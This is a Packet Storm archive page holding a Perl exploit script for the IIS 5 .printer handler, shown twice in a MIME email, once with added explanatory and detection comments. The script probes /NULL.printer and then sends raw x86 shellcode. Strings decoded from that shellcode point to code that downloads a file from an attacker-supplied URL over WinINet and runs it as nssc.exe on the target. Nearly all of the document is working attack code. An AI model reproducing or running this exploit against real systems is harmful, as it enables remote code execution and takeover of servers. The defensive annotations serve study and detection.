
iis.pl.txt

🗓️ 26 Oct 2004 00:00:00 · Reported by Diabolic Crab · Type: packetstorm · 🔗 packetstormsecurity.com

IIS 5 Null Printer exploit: a Perl script that connects to the server, checks whether it appears vulnerable and, if so, sends an exploit payload.


Code
`This is a multi-part message in MIME format.  
  
------=_NextPart_000_001D_01C4B563.F871BDD0  
Content-Type: text/plain;  
charset="iso-8859-1"  
Content-Transfer-Encoding: quoted-printable  
  
http://icis.digitalparadox.org/~dcrab/iis.pl=20  
#!/usr/bin/perl -w  
use IO::Socket;  
# Banner: prints the tool name, author credit and greetings to stdout.  
# Nothing in this run of statements touches the network.  
print "\n#############################################\n";  
print "#IIS 5 Null Printer Exploit by Diabolic Crab#\n";  
print "# Shouts to Mr.J Zinho Subby Sync #\n";  
print "# Fluidmotion Haking Ta|0n Pheonix #\n";  
print "# Phreaked Bread Moth Volcom Sany #\n";  
print "# Defcon Ref0rm and everyone els #\n";  
print "# C0replay, Hackerscenter, dP #\n";  
print "# www.hackerscenter.com #\n";  
print "# www.digitalparadox.org #\n";  
print "\#############################################\n";  
# Argument check: ARGV[0] is the target hostname and ARGV[1] is the  
# value the usage text calls filetodownload. Each must be present  
# and true; otherwise the usage line is printed and the script exits.  
unless ($ARGV[0]) {  
print "\n#Usage: $0 hostname filetodownload#\n";  
exit();  
}  
unless ($ARGV[1]) {  
print "\n#Usage: $0 hostname filetodownload#\n";  
exit();  
}  
# First TCP connection to the target: port 80, 10 second timeout.  
$socket =3D IO::Socket::INET->new(  
Proto =3D> 'tcp',  
PeerAddr =3D> $ARGV[0],  
PeerPort =3D> 80,  
Timeout =3D> 10,  
);  
# $bish is the verdict flag: 0 here, set to 1 only by the loop below.  
$bish =3D 0;  
# $url is ARGV[1] copied unchanged; it is later placed verbatim in  
# the byte list that is sent to the server.  
$url =3D $ARGV[1];  
print "#Connecting to $ARGV[0]\n";  
unless($socket) {  
# die() ends the script here, so the exit() after it is never reached.  
die("#Could not connect to $ARGV[0]:80\n");  
exit();  
}  
print "#Connection Established\n";  
$socket->autoflush(1);  
# Probe request. Detection note: the path /NULL.printer and the header  
# Client-Agent:IIS_Printer_Scan are fixed strings, so they are usable  
# as search terms in web server logs, proxy logs and packet captures.  
print $socket ("GET /NULL.printer=20  
HTTP/1.1\nClient-Agent:IIS_Printer_Scan\nHost:$ARGV[0]\r\n\r\n");  
print "#Packet sent\n";  
# Reads the reply line by line until the read returns nothing more.  
# NOTE(review): the test is an exact string compare against a whole  
# line as read from the socket, line terminator included, so the flag  
# may never be set. Treat the verdict this script prints as unreliable  
# and do not use it as a vulnerability assessment.  
while ($line =3D <$socket>) {  
if ($line eq "<h1>Bad Request</h1>") {  
$bish =3D 1  
}  
}  
# Attack branch: runs whenever the probe above did not set the flag.  
# Presumably this targets the IIS 5 handler for .printer requests;  
# removing that script mapping where it is unused and keeping the  
# server patched are the usual mitigations -- confirm against the  
# vendor advisory.  
if ($bish ne 1) {  
print "#Server seems to be exploitable\n";  
# @shell is the list of byte strings sent to the target: a newline, a  
# request line for /NULL.printer, then raw binary data. The binary  
# part is opaque machine code; only its readable portion is described  
# in the comments further down.  
@shell =3D ("\n","GET /NULL.printer HTTP/1.1\n" ,=20  
"\xEB\x30\x5F\xFC\x8B\xF7\x80"  
,"\x3F\x08\x75\x03\x80\x37\x08\x47\x80\x3F\x01\x75\xF2\x8B\xE6\x33\xD2\xB=  
2\x04\xC1"  
,"\xE2\x08\x2B\xE2\x8B\xEC\x33\xD2\xB2\x03\xC1\xE2\x08\x2B\xE2\x54\x5A\xB=  
2\x7C\x8B"  
,"\xE2\xEB\x02\xEB\x57\x89\x75\xFC\x33\xC0\xB4\x40\xC1\xE0\x08\x89\x45\xF=  
8\x8B\x40"  
,"\x3C\x03\x45\xF8\x8D\x40\x7E\x8B\x40\x02\x03\x45\xF8\x8B\xF8\x8B\x7F\x0=  
C\x03\x7D"  
,"\xF8\x81\x3F\x4B\x45\x52\x4E\x74\x07\x83\xC0\x14\x8B\xF8\xEB\xEB\x50\x8=  
B\xF8\x33"  
,"\xC9\x33\xC0\xB1\x10\x8B\x17\x03\x55\xF8\x52\xEB\x03\x57\x8B\xD7\x80\x7=  
A\x03\x80"  
,"\x74\x16\x8B\x32\x03\x75\xF8\x83\xC6\x02\xEB\x02\xEB\x7E\x8B\x7D\xFC\x5=  
1\xF3\xA6"  
,"\x59\x5F\x74\x06\x40\x83\xC7\x04\xEB\xDB\x5F\x8B\x7F\x10\x03\x7D\xF8\xC=  
1\xE0\x02"  
,"\x03\xF8\x8B\x07\x8B\x5D\xFC\x8D\x5B\x11\x53\xFF\xD0\x89\x45\xF4\x8B\x4=  
0\x3C\x03"  
,"\x45\xF4\x8B\x70\x78\x03\x75\xF4\x8D\x76\x1C\xAD\x03\x45\xF4\x89\x45\xF=  
0\xAD\x03"  
,"\x45\xF4\x89\x45\xEC\xAD\x03\x45\xF4\x89\x45\xE8\x8B\x55\xEC\x8B\x75\xF=  
C\x8D\x76"  
,"\x1E\x33\xDB\x33\xC9\xB1\x0F\x8B\x3A\x03\x7D\xF4\x56\x51\xF3\xA6\x59\x5=  
E\x74\x06"  
,"\x43\x8D\x52\x04\xEB\xED\xD1\xE3\x8B\x75\xE8\x03\xF3\x33\xC9\x66\x8B\x0=  
E\xEB\x02"  
,"\xEB\x7D\xC1\xE1\x02\x03\x4D\xF0\x8B\x09\x03\x4D\xF4\x89\x4D\xE4\x8B\x5=  
D\xFC\x8D"  
,"\x5B\x2D\x33\xC9\xB1\x07\x8D\x7D\xE0\x53\x51\x53\x8B\x55\xF4\x52\x8B\x4=  
5\xE4\xFC"  
,"\xFF\xD0\x59\x5B\xFD\xAB\x8D\x64\x24\xF8\x38\x2B\x74\x03\x43\xEB\xF9\x4=  
3\xE2\xE1"  
,"\x8B\x45\xE0\x53\xFC\xFF\xD0\xFD\xAB\x33\xC9\xB1\x04\x8D\x5B\x0C\xFC\x5=  
3\x51\x53"  
,"\x8B\x55\xC4\x52\x8B\x45\xE4\xFF\xD0\x59\x5B\xFD\xAB\x38\x2B\x74\x03\x4=  
3\xEB\xF9"  
,"\x43\xE2\xE5\xFC\x33\xD2\xB6\x1F\xC1\xE2\x08\x52\x33\xD2\x52\x8B\x45\xD=  
4\xFF\xD0"  
,"\x89\x45\xB0\x33\xD2\xEB\x02\xEB\x77\x52\x52\x52\x52\x53\x8B\x45\xC0\xF=  
F\xD0\x8D"  
,"\x5B\x03\x89\x45\xAC\x33\xD2\x52\xB6\x80\xC1\xE2\x10\x52\x33\xD2\x52\x5=  
2\x8D\x7B"  
,"\x09\x57\x50\x8B\x45\xBC\xFF\xD0\x89\x45\xA8\x8D\x55\xA0\x52\x33\xD2\xB=  
6\x1F\xC1"  
,"\xE2\x08\x52\x8B\x4D\xB0\x51\x50\x8B\x45\xB8\xFF\xD0\x8B\x4D\xA8\x51\x8=  
B\x45\xB4"  
,"\xFF\xD0\x8B\x4D\xAC\x51\x8B\x45\xB4\xFF\xD0\x33\xD2\x52\x53\x8B\x45\xD=  
C\xFF\xD0"  
,"\x89\x45\xA4\x8B\x7D\xA0\x57\x8B\x55\xB0\x52\x50\x8B\x45\xD8\xFF\xD0\x8=  
B\x55\xA4"  
,"\x52\x8B\x45\xD0\xFF\xD0\xEB\x02\xEB\x12\x33\xD2\x90\x52\x53\x8B\x45\xC=  
C\xFF\xD0"  
# From partway through the next element the bytes are printable ASCII  
# names separated by \x08. Decoded they read: GetModuleHandleA,  
# kernel32.dll, GetProcAddress, LoadLibraryA, _lcreat, _lwrite,  
# GlobalAlloc, _lclose, WinExec, ExitProcess, wininet.dll,  
# InternetOpenA, InternetOpenUrlA, InternetReadFile,  
# InternetCloseHandle, NS, nssc.exe.  
# That set of names is consistent with code that fetches a URL over  
# WinINet, writes the data to a file and runs it -- presumably the  
# file is nssc.exe; confirm by analysis in an isolated lab.  
# Defender indicators that follow from this: a file named nssc.exe  
# created or started by the web server process, and outbound HTTP  
# requests originating from the web server itself.  
,"\x33\xD2\x52\x8B\x45\xC8\xFF\xD0\xE8\xE6\xFD\xFF\xFF\x47\x65\x74\x4D\x6=  
F\x64\x75"  
,"\x6C\x65\x48\x61\x6E\x64\x6C\x65\x41\x08\x6B\x65\x72\x6E\x65\x6C\x33\x3=  
2\x2E\x64"  
,"\x6C\x6C\x08\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x0=  
8\x4C\x6F"  
,"\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x08\x5F\x6C\x63\x72\x65\x61\x7=  
4\x08\x5F"  
,"\x6C\x77\x72\x69\x74\x65\x08\x47\x6C\x6F\x62\x61\x6C\x41\x6C\x6C\x6F\x6=  
3\x08\x5F"  
,"\x6C\x63\x6C\x6F\x73\x65\x08\x57\x69\x6E\x45\x78\x65\x63\x08\x45\x78\x6=  
9\x74\x50"  
,"\x72\x6F\x63\x65\x73\x73\x08\x77\x69\x6E\x69\x6E\x65\x74\x2E\x64\x6C\x6=  
C\x08\x49"  
,"\x6E\x74\x65\x72\x6E\x65\x74\x4F\x70\x65\x6E\x41\x08\x49\x6E\x74\x65\x7=  
2\x6E\x65"  
,"\x74\x4F\x70\x65\x6E\x55\x72\x6C\x41\x08\x49\x6E\x74\x65\x72\x6E\x65\x7=  
4\x52\x65"  
,"\x61\x64\x46\x69\x6C\x65\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x43\x6C\x6=  
F\x73\x65"  
,"\x48\x61\x6E\x64\x6C\x65\x08\x4E\x53\x08\x6E\x73\x73\x63\x2E\x65\x78\x6=  
5\x08"  
# The ARGV[1] value is embedded here exactly as the caller typed it.  
,"$url"  
,"\x08\x01");  
# Second, separate TCP connection to the same host and port. Unlike  
# the first socket, its result is not checked before it is used.  
$socket2 =3D IO::Socket::INET->new(  
Proto =3D> 'tcp',  
PeerAddr =3D> $ARGV[0],  
PeerPort =3D> 80,  
Timeout =3D> 10,  
);  
# Each list element goes out in its own send() call with a one second  
# pause after it, so on the wire this is a slow series of small  
# segments rather than one request. Network sensors need stream  
# reassembly to match on the content as a whole.  
foreach $ms(@shell) {  
send($socket2, $ms, 0) or die "\n[x] #Unable to send exploit: $!";  
sleep(1);  
}  
# Status text only: no reply is read on this connection, so these two  
# messages do not confirm any effect on the target.  
print "#Attempting to download file\n";  
print "#Exploit sent\n";  
# NOTE(review): the argument is the bareword socket2, not the  
# $socket2 variable opened above.  
close(socket2);  
}  
# Reached on every run; the message prints only when the probe loop  
# set the flag to 1, that is, when a reply line compared equal to the  
# Bad Request heading.  
if ($bish eq 1) {  
print "#Server seems to be not exploitable\n";  
}  
exit();  
  
------=_NextPart_000_001D_01C4B563.F871BDD0  
Content-Type: text/html;  
charset="iso-8859-1"  
Content-Transfer-Encoding: quoted-printable  
  
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">  
<HTML><HEAD>  
<META http-equiv=3DContent-Type content=3D"text/html; =  
charset=3Diso-8859-1">  
<META content=3D"MSHTML 6.00.2900.2523" name=3DGENERATOR>  
<STYLE></STYLE>  
</HEAD>  
<BODY bgColor=3D#ffffff>  
<DIV><FONT face=3DArial size=3D2><!--StartFragment --><FONT =  
face=3D"Times New Roman"=20  
size=3D3><FONT face=3DArial size=3D2><A=20  
href=3D"http://icis.digitalparadox.org/~dcrab/iis.pl">http://icis.digital=  
paradox.org/~dcrab/iis.pl</A></FONT>&nbsp;</FONT><PRE>#!/usr/bin/perl -w  
use IO::Socket;  
print "\n#############################################\n";  
print "#IIS 5 Null Printer Exploit by Diabolic Crab#\n";  
print "# Shouts to Mr.J Zinho Subby Sync #\n";  
print "# Fluidmotion Haking Ta|0n Pheonix #\n";  
print "# Phreaked Bread Moth Volcom Sany #\n";  
print "# Defcon Ref0rm and everyone els #\n";  
print "# C0replay, Hackerscenter, dP #\n";  
print "# www.hackerscenter.com #\n";  
print "# www.digitalparadox.org #\n";  
print "\#############################################\n";  
unless ($ARGV[0]) {  
print "\n#Usage: $0 hostname filetodownload#\n";  
exit();  
}  
unless ($ARGV[1]) {  
print "\n#Usage: $0 hostname filetodownload#\n";  
exit();  
}  
$socket =3D IO::Socket::INET->new(  
Proto =3D> 'tcp',  
PeerAddr =3D> $ARGV[0],  
PeerPort =3D> 80,  
Timeout =3D> 10,  
);  
$bish =3D 0;  
$url =3D $ARGV[1];  
print "#Connecting to $ARGV[0]\n";  
unless($socket) {  
die("#Could not connect to $ARGV[0]:80\n");  
exit();  
}  
print "#Connection Established\n";  
$socket->autoflush(1);  
print $socket ("GET /NULL.printer=20  
HTTP/1.1\nClient-Agent:IIS_Printer_Scan\nHost:$ARGV[0]\r\n\r\n");  
print "#Packet sent\n";  
while ($line =3D <$socket>) {  
if ($line eq "<h1>Bad Request</h1>") {  
$bish =3D 1  
}  
}  
if ($bish ne 1) {  
print "#Server seems to be exploitable\n";  
@shell =3D ("\n","GET /NULL.printer HTTP/1.1\n" ,=20  
"\xEB\x30\x5F\xFC\x8B\xF7\x80"  
,"\x3F\x08\x75\x03\x80\x37\x08\x47\x80\x3F\x01\x75\xF2\x8B\xE6\x33\xD2\xB=  
2\x04\xC1"  
,"\xE2\x08\x2B\xE2\x8B\xEC\x33\xD2\xB2\x03\xC1\xE2\x08\x2B\xE2\x54\x5A\xB=  
2\x7C\x8B"  
,"\xE2\xEB\x02\xEB\x57\x89\x75\xFC\x33\xC0\xB4\x40\xC1\xE0\x08\x89\x45\xF=  
8\x8B\x40"  
,"\x3C\x03\x45\xF8\x8D\x40\x7E\x8B\x40\x02\x03\x45\xF8\x8B\xF8\x8B\x7F\x0=  
C\x03\x7D"  
,"\xF8\x81\x3F\x4B\x45\x52\x4E\x74\x07\x83\xC0\x14\x8B\xF8\xEB\xEB\x50\x8=  
B\xF8\x33"  
,"\xC9\x33\xC0\xB1\x10\x8B\x17\x03\x55\xF8\x52\xEB\x03\x57\x8B\xD7\x80\x7=  
A\x03\x80"  
,"\x74\x16\x8B\x32\x03\x75\xF8\x83\xC6\x02\xEB\x02\xEB\x7E\x8B\x7D\xFC\x5=  
1\xF3\xA6"  
,"\x59\x5F\x74\x06\x40\x83\xC7\x04\xEB\xDB\x5F\x8B\x7F\x10\x03\x7D\xF8\xC=  
1\xE0\x02"  
,"\x03\xF8\x8B\x07\x8B\x5D\xFC\x8D\x5B\x11\x53\xFF\xD0\x89\x45\xF4\x8B\x4=  
0\x3C\x03"  
,"\x45\xF4\x8B\x70\x78\x03\x75\xF4\x8D\x76\x1C\xAD\x03\x45\xF4\x89\x45\xF=  
0\xAD\x03"  
,"\x45\xF4\x89\x45\xEC\xAD\x03\x45\xF4\x89\x45\xE8\x8B\x55\xEC\x8B\x75\xF=  
C\x8D\x76"  
,"\x1E\x33\xDB\x33\xC9\xB1\x0F\x8B\x3A\x03\x7D\xF4\x56\x51\xF3\xA6\x59\x5=  
E\x74\x06"  
,"\x43\x8D\x52\x04\xEB\xED\xD1\xE3\x8B\x75\xE8\x03\xF3\x33\xC9\x66\x8B\x0=  
E\xEB\x02"  
,"\xEB\x7D\xC1\xE1\x02\x03\x4D\xF0\x8B\x09\x03\x4D\xF4\x89\x4D\xE4\x8B\x5=  
D\xFC\x8D"  
,"\x5B\x2D\x33\xC9\xB1\x07\x8D\x7D\xE0\x53\x51\x53\x8B\x55\xF4\x52\x8B\x4=  
5\xE4\xFC"  
,"\xFF\xD0\x59\x5B\xFD\xAB\x8D\x64\x24\xF8\x38\x2B\x74\x03\x43\xEB\xF9\x4=  
3\xE2\xE1"  
,"\x8B\x45\xE0\x53\xFC\xFF\xD0\xFD\xAB\x33\xC9\xB1\x04\x8D\x5B\x0C\xFC\x5=  
3\x51\x53"  
,"\x8B\x55\xC4\x52\x8B\x45\xE4\xFF\xD0\x59\x5B\xFD\xAB\x38\x2B\x74\x03\x4=  
3\xEB\xF9"  
,"\x43\xE2\xE5\xFC\x33\xD2\xB6\x1F\xC1\xE2\x08\x52\x33\xD2\x52\x8B\x45\xD=  
4\xFF\xD0"  
,"\x89\x45\xB0\x33\xD2\xEB\x02\xEB\x77\x52\x52\x52\x52\x53\x8B\x45\xC0\xF=  
F\xD0\x8D"  
,"\x5B\x03\x89\x45\xAC\x33\xD2\x52\xB6\x80\xC1\xE2\x10\x52\x33\xD2\x52\x5=  
2\x8D\x7B"  
,"\x09\x57\x50\x8B\x45\xBC\xFF\xD0\x89\x45\xA8\x8D\x55\xA0\x52\x33\xD2\xB=  
6\x1F\xC1"  
,"\xE2\x08\x52\x8B\x4D\xB0\x51\x50\x8B\x45\xB8\xFF\xD0\x8B\x4D\xA8\x51\x8=  
B\x45\xB4"  
,"\xFF\xD0\x8B\x4D\xAC\x51\x8B\x45\xB4\xFF\xD0\x33\xD2\x52\x53\x8B\x45\xD=  
C\xFF\xD0"  
,"\x89\x45\xA4\x8B\x7D\xA0\x57\x8B\x55\xB0\x52\x50\x8B\x45\xD8\xFF\xD0\x8=  
B\x55\xA4"  
,"\x52\x8B\x45\xD0\xFF\xD0\xEB\x02\xEB\x12\x33\xD2\x90\x52\x53\x8B\x45\xC=  
C\xFF\xD0"  
,"\x33\xD2\x52\x8B\x45\xC8\xFF\xD0\xE8\xE6\xFD\xFF\xFF\x47\x65\x74\x4D\x6=  
F\x64\x75"  
,"\x6C\x65\x48\x61\x6E\x64\x6C\x65\x41\x08\x6B\x65\x72\x6E\x65\x6C\x33\x3=  
2\x2E\x64"  
,"\x6C\x6C\x08\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x0=  
8\x4C\x6F"  
,"\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x08\x5F\x6C\x63\x72\x65\x61\x7=  
4\x08\x5F"  
,"\x6C\x77\x72\x69\x74\x65\x08\x47\x6C\x6F\x62\x61\x6C\x41\x6C\x6C\x6F\x6=  
3\x08\x5F"  
,"\x6C\x63\x6C\x6F\x73\x65\x08\x57\x69\x6E\x45\x78\x65\x63\x08\x45\x78\x6=  
9\x74\x50"  
,"\x72\x6F\x63\x65\x73\x73\x08\x77\x69\x6E\x69\x6E\x65\x74\x2E\x64\x6C\x6=  
C\x08\x49"  
,"\x6E\x74\x65\x72\x6E\x65\x74\x4F\x70\x65\x6E\x41\x08\x49\x6E\x74\x65\x7=  
2\x6E\x65"  
,"\x74\x4F\x70\x65\x6E\x55\x72\x6C\x41\x08\x49\x6E\x74\x65\x72\x6E\x65\x7=  
4\x52\x65"  
,"\x61\x64\x46\x69\x6C\x65\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x43\x6C\x6=  
F\x73\x65"  
,"\x48\x61\x6E\x64\x6C\x65\x08\x4E\x53\x08\x6E\x73\x73\x63\x2E\x65\x78\x6=  
5\x08"  
,"$url"  
,"\x08\x01");  
$socket2 =3D IO::Socket::INET->new(  
Proto =3D> 'tcp',  
PeerAddr =3D> $ARGV[0],  
PeerPort =3D> 80,  
Timeout =3D> 10,  
);  
foreach $ms(@shell) {  
send($socket2, $ms, 0) or die "\n[x] #Unable to send exploit: $!";  
sleep(1);  
}  
print "#Attempting to download file\n";  
print "#Exploit sent\n";  
close(socket2);  
}  
if ($bish eq 1) {  
print "#Server seems to be not exploitable\n";  
}  
exit();  
</PRE></FONT></DIV></BODY></HTML>  
  
------=_NextPart_000_001D_01C4B563.F871BDD0--  
`
